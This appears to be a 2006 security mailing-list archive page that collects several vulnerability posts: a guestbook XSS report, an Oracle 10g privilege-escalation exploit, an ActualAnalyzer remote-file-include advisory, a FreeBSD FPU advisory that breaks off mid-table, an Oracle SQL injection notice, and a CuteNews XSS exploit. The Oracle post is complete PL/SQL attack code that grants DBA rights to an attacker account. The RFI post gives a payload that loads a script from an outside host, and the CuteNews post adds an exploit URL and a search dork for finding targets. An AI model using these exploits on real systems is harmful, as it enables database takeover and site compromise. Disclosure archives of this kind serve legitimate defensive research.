Many web-hosting sites powered by Community Architect offer free as well as 
paid services to those who want to host a website on their servers. They offer 
customized Guest-book input form page 
(http://www.vulnerablesite.com/fsguest.html), Guest-book page 
(http://www.vulnerablesite.com/fsguestbook.html) along with ready-made script 
(http://www.vulnerablesite.com/cgi-bin/guest) to the web-designer designing a 
website on their servers.

A person visiting the website signs the guest-book by filling up the form in 
http://www.vulnerablesite.com/fsguest.html. On submission, the inputs are 
submitted to the script, http://www.vulnerablesite.com/cgi-bin/guest on the 
server. The script processes the input and updates the page, 
http://www.vulnerablesite.com/fsguestbook.html to reflect the new message 
submitted by the user.

Vulnerability Description
=
The script, http://www.vulnerablesite.com/cgi-bin/guest, is vulnerable to XSS 
since it doesn't validate the input for the presence of HTML tags. As a result 
HTML tags & JavaScript codes entered as input in the form of 
http://www.vulnerablesite.com/fsguest.html become a part of the HTML code of 
http://www.vulnerablesite.com/fsguestbook.html and hence it is executed by the 
browser when any user visits the page.

It provides the attacker an opportunity to inject HTML formatting elements to 
tamper with the display of the page or inject JavaScript code to trouble the 
user visiting this page.

Contact Information
==
For more information, please contact:-

Susam Pal,
Infosys Technologies Ltd.
Survey No. 210, Manikonda Village
Lingampally, Rangareddy District
Hyderabad, PIN 500019
India
Phone No.: +91-99859521

Email: [EMAIL PROTECTED]


Oracle 10g 10.2.0.2.0 DBA exploit

2006-04-19 Thread putosoft softputo

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3  
VARCHAR2,p4  VARCHAR2,env SYS.odcienv)

  RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3  
VARCHAR2,p4  VARCHAR2,env SYS.odcienv)

   RETURN NUMBER
 IS
  pragma autonomous_transaction;
 BEGIN
   EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
   COMMIT;
   RETURN(1);
 END;

END;
/

DECLARE
 INDEX_NAME VARCHAR2(200);
 INDEX_SCHEMA VARCHAR2(200);
 TYPE_NAME VARCHAR2(200);
 TYPE_SCHEMA VARCHAR2(200);
 VERSION VARCHAR2(200);
 NEWBLOCK PLS_INTEGER;
 GMFLAGS NUMBER;
 v_Return VARCHAR2(200);
BEGIN
 INDEX_NAME := 'A1';  INDEX_SCHEMA := 'HACKER';
 TYPE_NAME := 'MYBADPACKAGE';  TYPE_SCHEMA := 'HACKER';
 VERSION := '10.2.0.2.0';  GMFLAGS := 1;

 v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
   INDEX_NAME => INDEX_NAME,INDEX_SCHEMA => INDEX_SCHEMA,TYPE_NAME 
=> TYPE_NAME,
   TYPE_SCHEMA => TYPE_SCHEMA,VERSION => VERSION,NEWBLOCK => 
NEWBLOCK,GMFLAGS => GMFLAGS

  );
END;
/

_
Acepta el reto MSN Premium: Correos más divertidos con fotos y textos 
increíbles en MSN Premium. Descárgalo y pruébalo 2 meses gratis. 
http://join.msn.com?XAPID=1697&DI=1055&HL=Footer_mailsenviados_correosmasdivertidos




[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability

2006-04-19 Thread admin
[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability 
---
Software: ActualAnalyzer
Type: Remote File Include Vulnerability
Date: April, 19th 2006
Vendor: ActualScripts
Page: http://actualscripts.com
Risc: High


Credits:

Discovered by: 'Aesthetico'
http://www.majorsecurity.de


Affected Products:

ActualAnalyzer Lite 2.72   and prior
ActualAnalyzer Gold 7.63   and prior
ActualAnalyzer Server 8.23 and prior

Description:

ActualAnalyzer is a powerful statistics-gathering and analysis tool for 
monitoring web site traffic. 
It is equally effective for sites with low and high volumes of traffic 
and provides a wealth of comparative and analytical information.
High performance is achieved by using a MySQL database. 


Requirements:

register_globals = On


Vulnerability:

Input passed to the "rf" parameter in "direct.php" is not
properly verified, before it is used to include files. This can be
exploited to include arbitrary files from external resources.


Solution:

Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".


Exploitation:

Post data:
rf=http://www.yourspace.com/yourscript.php?


FreeBSD Security Advisory FreeBSD-SA-06:14.fpu

2006-04-19 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

=
FreeBSD-SA-06:14.fpuSecurity Advisory
  The FreeBSD Project

Topic:  FPU information disclosure

Category:   core
Module: sys
Announced:  2006-04-19
Credits:Jan Beulich
Affects:All FreeBSD/i386 and FreeBSD/amd64 releases.
Corrected:  2006-04-19 07:00:35 UTC (RELENG_6, 6.1-STABLE)
2006-04-19 07:00:50 UTC (RELENG_6_1, 6.1-RELEASE)
2006-04-19 07:01:12 UTC (RELENG_6_0, 6.0-RELEASE-p7)
2006-04-19 07:01:30 UTC (RELENG_5, 5.5-STABLE)
2006-04-19 07:01:53 UTC (RELENG_5_4, 5.4-RELEASE-p14)
2006-04-19 07:02:23 UTC (RELENG_5_3, 5.3-RELEASE-p29)
2006-04-19 07:02:43 UTC (RELENG_4, 4.11-STABLE)
2006-04-19 07:03:01 UTC (RELENG_4_11, 4.11-RELEASE-p17)
2006-04-19 07:03:14 UTC (RELENG_4_10, 4.10-RELEASE-p23)
CVE Name:   CVE-2006-1056

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
http://www.freebsd.org/security/>.

I.   Background

The floating-point unit (FPU) of i386 and amd64 processors is derived from
the original 8087 floating-point co-processor.  As a result, the FPU
contains the same debugging registers FOP, FIP, and FDP which store the
opcode, instruction address, and data address of the instruction most
recently executed by the FPU.

On processors implementing the "SSE" instruction set, a new pair of
instructions fxsave/fxrstor replaces the earlier fsave/frstor pair used
for saving and restoring the FPU state.  These new instructions also
save and restore the contents of the additional registers used by SSE
instructions.

II.  Problem Description

On "7th generation" and "8th generation" processors manufactured by AMD,
including the AMD Athlon, Duron, Athlon MP, Athlon XP, Athlon64, Athlon64
FX, Opteron, Turion, and Sempron, the fxsave and fxrstor instructions do
not save and restore the FOP, FIP, and FDP registers unless the exception
summary bit (ES) in the x87 status word is set to 1, indicating that an
unmasked x87 exception has occurred.

This behaviour is consistent with documentation provided by AMD, but is
different from processors from other vendors, which save and restore the
FOP, FIP, and FDP registers regardless of the value of the ES bit.  As a
result of this discrepancy remaining unnoticed until now, the FreeBSD
kernel does not restore the contents of the FOP, FIP, and FDP registers
between context switches.

III. Impact

On affected processors, a local attacker can monitor the execution path
of a process which uses floating-point operations.  This may allow an
attacker to steal cryptographic keys or other sensitive information.

IV.  Workaround

No workaround is available, but systems which do not use AMD Athlon, Duron,
Athlon MP, Athlon XP, Athlon64, Athlon64 FX, Opteron, Turion, or Sempron
processors are not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 4-STABLE, 5-STABLE, or 6-STABLE,
or to the RELENG_6_0, RELENG_5_4, RELENG_5_3, RELENG_4_11, or
RELENG_4_10 security branch dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 4.10,
4.11, 5.3, 5.4, and 6.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 4.x]
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu4x.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu4x.patch.asc

[FreeBSD 5.x and 6.x]
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:14/fpu.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
http://www.freebsd.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch   Revision
  Path
- -
RELENG_4
  src/sys/i386/isa/npx.c 1.80.2.4
RELENG_4_11
  src/UPDATING 1.73.2.91.2.18
  src/sys/conf/newvers.sh  1.44.2.39.2.21
  src/sys/i386/isa/npx.c1.80.2.3.14.1
RELENG_4_10
  src/UPDATING 1.73.2.90.2.24
  src/sys/conf/newvers.sh  1.44.2.34.2.25
  src/sys/i386/isa/npx.c   

SQL Injection in package SYS.DBMS_LOGMNR_SESSION

2006-04-19 Thread ak
SQL Injection in package SYS.DBMS_LOGMNR_SESSION

NameSQL Injection in package SYS.DBMS_LOGMNR_SESSION
Systems AffectedOracle Database
SeverityMedium Risk
CategorySQL Injection (DB06)
Vendor URL  http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Advisory18 April 2006 (V 1.00)
Oracle Bugid6980723


Details
###
The package SYS.DBMS_LOGMNR_SESSION contains a SQL injection vulnerability in 
the procedure DELETE_FROM_TABLE.
Oracle fixed this problem by using the package DBMS_ASSERT.

This advisory
##
http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_logmnr_session.html


Patch Information
#
Apply the patches for Oracle CPU April 2006 on top of Oracle 9i Release 2 or 
Oracle 10g Release 1.
The patches are available via Oracle Metalink.



History
###
01-nov-2005 Oracle secalert was informed
02-nov-2005 Oracle secalert asked for an exploit
18-apr-2006 Oracle published CPU April 2006
18-apr-2006 Advisory published



Additional information
##
An analysis of the Oracle CPU April 2006 is available here
http://www.red-database-security.com/advisory/oracle_cpu_apr_2006.html

Many (40+) open security issues in Oracle are still unfixed
http://www.red-database-security.com/advisory/upcoming_alerts.html


CuteNews 1.4.1 <= Cross Site Scripting

2006-04-19 Thread sn4k3 . 23
// CuteNews 1.4.1 <= Cross Site Scripting //

-

[~] Advisory by: LoK-Crew ~ Snake_23

[-] Exploit: 
http://www.example.com/index.php?mod=editnews&action=editnews&id=1145397112&source=[XSS]

[-] Googledork: Powered by CuteNews 1.4.1 

[+] Greetz to: PHCN
[+] Visit: www.LoK-Crew.de.am